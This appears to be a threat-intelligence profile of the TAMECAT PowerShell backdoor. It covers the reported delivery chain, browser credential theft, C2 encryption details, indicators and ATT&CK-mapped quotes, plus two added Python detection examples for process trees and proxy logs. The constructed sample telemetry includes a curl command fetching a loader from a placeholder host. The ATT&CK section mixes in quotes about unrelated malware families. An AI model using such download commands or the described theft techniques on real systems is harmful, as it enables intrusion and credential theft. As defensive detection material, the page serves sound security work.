TAMECAT
TAMECAT is a modular PowerShell-based backdoor used in espionage operations and attributed in the cited reporting to the Iranian state-sponsored actor APT42; some reporting also associates related activity and tooling overlap with SpearSpecter and GreenCharlie. It is described as operating largely in memory (filelessly) to minimize forensic artifacts and evade detection. Reported targeting includes senior defense and government officials, defense and government organizations, NGOs, media, educational institutions, activists, legal services, and family members of officials.
The described intrusion chain begins with social engineering, including long-term rapport building and WhatsApp-based lures, followed by delivery of a malicious file or link. Multiple reports describe an initial VBScript downloader that queries installed antivirus products via WMI and conditionally launches PowerShell via conhost or uses cmd.exe/curl to retrieve later stages. The loader, reported as nconf.txt hosted on tebi[.]io, is heavily obfuscated and uses Base64 decoding, custom byte/bit transformations, and AES decryption to release functional modules only after decryption.
TAMECAT supports reconnaissance, file harvesting, browser data theft, screenshot capture, and remote command execution. Reported capabilities include collecting OS version and computer name, generating victim-specific identifiers, writing an identifier to %LocalAppData%\config.txt, creating a Chrome directory under %LocalAppData%, stealing browser data from Microsoft Edge and Google Chrome via remote debugging, suspending browser processes to access cached credentials and passwords, capturing screenshots, crawling the filesystem for documents of interest, and downloading/executing additional scripts or code. Command handling described in the content parses decrypted C2 responses into language, command, thread name, and start/stop fields, with support for PowerShell or C# execution and actions such as downloadutils, start, and stop.
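The delivery chain and browser-theft behaviour described above translate directly into process-tree hunting rules. The following is an added example written for this page, not code from the original page or from any vendor report: it walks constructed process-creation events (the event fields, every pid, path and command line, and the PLACEHOLDER-HOST URL are made up for illustration) and flags three parent/child patterns the reporting describes: a script host (wscript or cscript) that ends up running PowerShell, with or without the conhost hop; the cmd.exe/curl retrieval path; and a browser started with Chrome's real --remote-debugging-port switch by a process that is not itself a browser.

```python
"""Process-tree hunting for the TAMECAT delivery chain (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe"}
REMOTE_DEBUG = re.compile(r"--remote-debugging-port(?:=\d+)?", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:            # assumed event shape; real EDR telemetry has more fields
    pid: int
    ppid: int
    image: str              # executable file name, lower-case
    cmdline: str


def ancestors(pid: int, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    """Parent chain of pid, nearest first; stops at a missing parent or a cycle."""
    chain: list[ProcEvent] = []
    seen = {pid}
    ev = by_pid.get(pid)
    while ev is not None:
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.pid in seen:
            break
        seen.add(parent.pid)
        chain.append(parent)
        ev = parent
    return chain


def hunt(events: list[ProcEvent]) -> list[tuple[str, int]]:
    """Apply the three rules to every event; returns (rule, pid) pairs in event order."""
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[str, int]] = []
    for e in events:
        lineage = {a.image for a in ancestors(e.pid, by_pid)}
        # Rule 1: script host -> (conhost ->) PowerShell. Checked at any depth,
        # so the conhost hop does not hide the VBScript origin.
        if e.image == "powershell.exe" and lineage & SCRIPT_HOSTS:
            findings.append(("script-host -> powershell", e.pid))
        # Rule 2: the alternative cmd.exe/curl retrieval path.
        if e.image == "curl.exe" and lineage & SCRIPT_HOSTS:
            findings.append(("script-host -> cmd/curl download", e.pid))
        # Rule 3: browser remote debugging enabled by a non-browser parent.
        parent = by_pid.get(e.ppid)
        if (e.image in BROWSERS and REMOTE_DEBUG.search(e.cmdline)
                and (parent is None or parent.image not in BROWSERS)):
            findings.append(("browser remote-debugging by non-browser", e.pid))
    return findings


# Constructed telemetry: one intrusion-like chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\invite.vbs"'),
    ProcEvent(300, 200, "conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -NoProfile -WindowStyle Hidden"),
    ProcEvent(500, 200, "cmd.exe", "cmd.exe /c curl.exe -s -o nconf.txt https://PLACEHOLDER-HOST/nconf.txt"),
    ProcEvent(600, 500, "curl.exe", "curl.exe -s -o nconf.txt https://PLACEHOLDER-HOST/nconf.txt"),
    ProcEvent(700, 400, "chrome.exe",
              r"chrome.exe --headless --remote-debugging-port=9222 --user-data-dir=C:\Users\u\AppData\Local\Chrome"),
    ProcEvent(800, 100, "chrome.exe", "chrome.exe"),                    # user-launched browser
    ProcEvent(900, 800, "chrome.exe", "chrome.exe --type=renderer"),    # browser child, not flagged
    ProcEvent(1000, 100, "powershell.exe", "powershell.exe"),           # admin console, not flagged
]

if __name__ == "__main__":
    for rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 3 keys on the parent rather than on the switch alone because browsers legitimately pass --remote-debugging-port to their own child processes and developers use it from IDEs; a PowerShell parent is the discriminator the reporting gives.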
Its command-and-control and exfiltration traffic is described as encrypted and obfuscated. Reporting states that TAMECAT encodes C2 traffic with Base64 and uses AES encryption for communications and stolen data. Multiple reports cite the AES key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B for encrypted content/exfiltration, with a randomly generated 16-character IV transmitted in an HTTP header named Content-DPR. One loader-related value T2r0y1M1e1n1o0w1 is also reported, and one analysis lists IV 0T9r1y1M2e0N0o1w in the script. TAMECAT forges browser user-agent strings and uses HTTP POST requests for exfiltration. Reported C2 channels and infrastructure include HTTPS, Telegram bots, Discord, Cloudflare Workers, WebDAV, Firebase, and accurate-sprout-porpoise[.]glitch[.]me; darijo-bosanac-dl[.]workers[.]dev and tebi[.]io are also mentioned in the delivery/C2 chain.
High-confidence indicators directly mentioned in the content include the VBScript SHA-256 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422, loader nconf.txt SHA-256 bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8, loader MD5 081419a484bbf99f278ce636d445b9d8, the hardcoded token GILNH9LX6TCZ9V8ZZSUF, and infrastructure including accurate-sprout-porpoise[.]glitch[.]me, darijo-bosanac-dl[.]workers[.]dev, and tebi[.]io.
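The C2 traits reported above (an AES IV carried in a Content-DPR header, Base64-wrapped AES payloads in HTTP POST bodies, and the named infrastructure) can be turned into proxy-log triage. The block below is an added example for this page, not code from the original page or from any vendor report. It runs three checks over constructed JSON-lines proxy records (the field names ts/method/host/path/req_headers/body_b64, the timestamps, the non-indicator hosts, the header values and the bodies are all assumptions): a request carrying a Content-DPR header whose value is a 16-character token rather than the numeric device-pixel-ratio the header is defined for; contact with a host named in the reporting; and a POST body that Base64-decodes to a whole number of 16-byte blocks, as AES-CBC ciphertext does. Each check contributes a reason so a single weak signal need not alert on its own.

```python
"""Proxy-log triage for the TAMECAT C2/exfiltration pattern (added example)."""
import base64
import binascii
import json
import re

# Hosts named in the reporting, with defanging brackets removed for matching.
KNOWN_INFRA = {
    "accurate-sprout-porpoise.glitch.me",
    "darijo-bosanac-dl.workers.dev",
    "tebi.io",
}
TOKEN16 = re.compile(r"^\S{16}$")


def on_known_infra(host: str) -> bool:
    """Exact or subdomain match against the reported infrastructure."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in KNOWN_INFRA)


def odd_content_dpr(headers: dict) -> bool:
    """Content-DPR is a numeric (client-hints) response header; a 16-character
    non-numeric token in a request header is the IV-carrying pattern reported."""
    for name, value in headers.items():
        if name.lower() == "content-dpr":
            try:
                float(value)
                return False          # legitimate numeric value
            except ValueError:
                return bool(TOKEN16.match(value))
    return False


def block_aligned_b64(body: str) -> bool:
    """True when the body is valid Base64 of >= 16 bytes in whole 16-byte blocks."""
    if not body:
        return False
    try:
        raw = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 16 and len(raw) % 16 == 0


def triage(lines: list, min_reasons: int = 1) -> list:
    """Return (ts, host, reasons) for records with at least min_reasons hits."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        reasons = []
        if odd_content_dpr(rec.get("req_headers", {})):
            reasons.append("content-dpr-token")
        if on_known_infra(rec.get("host", "")):
            reasons.append("known-infra")
        if rec.get("method") == "POST" and block_aligned_b64(rec.get("body_b64", "")):
            reasons.append("aes-block-aligned-body")
        if len(reasons) >= min_reasons:
            alerts.append((rec["ts"], rec["host"], reasons))
    return alerts


# Constructed proxy records. Timestamps, paths, header values, bodies and the
# example.org / cdn.tebi.io hosts are made up; only the apex indicator hosts come
# from the reporting.
_CIPHERTEXT_LIKE = base64.b64encode(bytes(32)).decode()   # two 16-byte blocks
SAMPLE_LOG = [json.dumps(r) for r in [
    {"ts": "2025-01-01T10:00:00Z", "method": "POST",
     "host": "accurate-sprout-porpoise.glitch.me", "path": "/",
     "req_headers": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                     "Content-DPR": "Ab3dEf9hIj2kLm4N"},
     "body_b64": _CIPHERTEXT_LIKE},
    {"ts": "2025-01-01T10:00:05Z", "method": "GET", "host": "www.example.org",
     "path": "/index.html", "req_headers": {"User-Agent": "Mozilla/5.0"}, "body_b64": ""},
    {"ts": "2025-01-01T10:00:09Z", "method": "POST", "host": "api.example.org",
     "path": "/upload", "req_headers": {"Content-DPR": "1.5"},
     "body_b64": base64.b64encode(b"hello").decode()},
    {"ts": "2025-01-01T10:01:00Z", "method": "GET", "host": "cdn.tebi.io",
     "path": "/nconf.txt", "req_headers": {"User-Agent": "curl/8.0"}, "body_b64": ""},
]]

if __name__ == "__main__":
    for ts, host, reasons in triage(SAMPLE_LOG):
        print(ts, host, ",".join(reasons))
```

Block alignment on its own is a weak signal (one in sixteen random-length bodies is aligned by chance) and tebi.io is a general-purpose object-storage service, so in production set min_reasons to 2, or weight the Content-DPR token highest: that header has no legitimate reason to appear in a request at all.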
Groups observed using it
4 distinct threat actors attributed by public researchers.
TAMECAT’s attack flow is highly automated, proceeding from initial user interaction with a malicious file to complete data exfiltration without perceptible intrusion.
Iran APT SpearSpecter Uses Weeks-Long WhatsApp Lures and Fileless TAMECAT Backdoor to Hit Defense
“GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR.”
Analysis of recent campaigns introduces TameCat, a modular, PowerShell-based backdoor used to target senior defense and government officials.
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 technique
Utilizes not only dedicated servers but also social platforms such as Discord and Telegram as backup control channels
Resource Development
1 technique
"The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures..."
Initial Access
3 techniques
Initial access continued to rely on spear phishing — delivering macro-enabled documents or malicious links.
The attack typically originates from a spear-phishing email disguised as official correspondence, with an attachment that appears to be an ordinary document but actually contains embedded VBScript.
Execution
6 techniques
Upon execution, it immediately queries the target device’s installed antivirus software list via WMI
which tend to rely on the use of command and scripting interpreters (T1059) like PowerShell (T1059.001).
it invokes conhost to launch PowerShell and retrieves the core payload via remote download utilities
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
with an attachment that appears to be an ordinary document but actually contains embedded VBScript. This script functions as a “reconnaissance operative.”
“phishing (T1566) … often leading to execution via user execution (T1204) of malicious files …”
Persistence
1 technique
Privilege Escalation
2 techniques
Fileless Execution: Operates entirely in memory without writing any malicious files to disk, making detection by traditional antivirus software extremely difficult.
Stealth
5 techniques
Command Obfuscation: Utilizes ambiguous expressions to replace plaintext execution commands, evading script detection mechanisms; AES Double Encryption: Core code is first Base64-encoded, then subjected to high-strength encryption
Forges browser user-agent strings to masquerade as legitimate network traffic
Fileless Execution: Operates entirely in memory without writing any malicious files to disk, making detection by traditional antivirus software extremely difficult.
“weaponizing LOLBins, including … Rundll32” / “rundll32.exe … davclnt.dll, DavSetCookie … .lnk”
GhostForm RAT via in-memory PowerShell execution within invisible Windows forms
Credential Access
4 techniques
The backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft
browser credential and session cookie theft
Browser Data Theft: Extracts data from mainstream browsers via remote debugging, suspending browser processes to read cached credentials, passwords, and other sensitive information
During the credential access phase, Iranian-linked attackers have prioritized stealing credentials from web browsers (T1555.003)
Discovery
4 techniques
Upon execution, it immediately queries the target device’s installed antivirus software list via WMI
For discovery, system information discovery (T1082) and file and directory discovery (T1083) have been the most prevalent methods used to map the environment.
APT42 has used a VBScript to query anti-virus products. TAMECAT has used VBScript to query anti-virus products.
Collection
3 techniques
The backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft
Screen Surveillance: Captures screenshots silently to comprehensively record target operational trajectories
The backdoor's capabilities span keylogging, screen capture, browser credential and session cookie theft, email collection
Command and Control
6 techniques
Command Reception: Receives control commands via Telegram bots, enabling download of additional scripts, execution of various code types, and flexible termination of attack processes.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
it invokes conhost to launch PowerShell and retrieves the core payload via remote download utilities
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
"GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure..."
Exfiltration
1 technique
Collected sensitive data is encrypted and transmitted to control servers via network requests.
IOCs tracked for this family
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
17 sources tracked across advisories, community write-ups, and news.
A modular, fileless malware that uses VBScript phishing and PowerShell-based staged delivery, decrypts payloads in memory, steals browser credentials and system information, captures screenshots, receives commands via Telegram bots, and exfiltrates encrypted data through C2 channels including dedicated servers, Discord, and Telegram.
A modular backdoor implemented in PowerShell, used for targeted intrusions against senior defense and government officials.
PowerShell-based backdoor used in long-term espionage that steals credentials from Edge/Chrome (via browser debugging), performs host reconnaissance, persists via files in %LocalAppData%, and exfiltrates data encrypted over HTTPS/Telegram/Discord-based C2.
PowerShell in-memory backdoor used by APT42 for surveillance, credential theft, screen capture, keylogging, reconnaissance, and exfiltration over multiple C2 channels.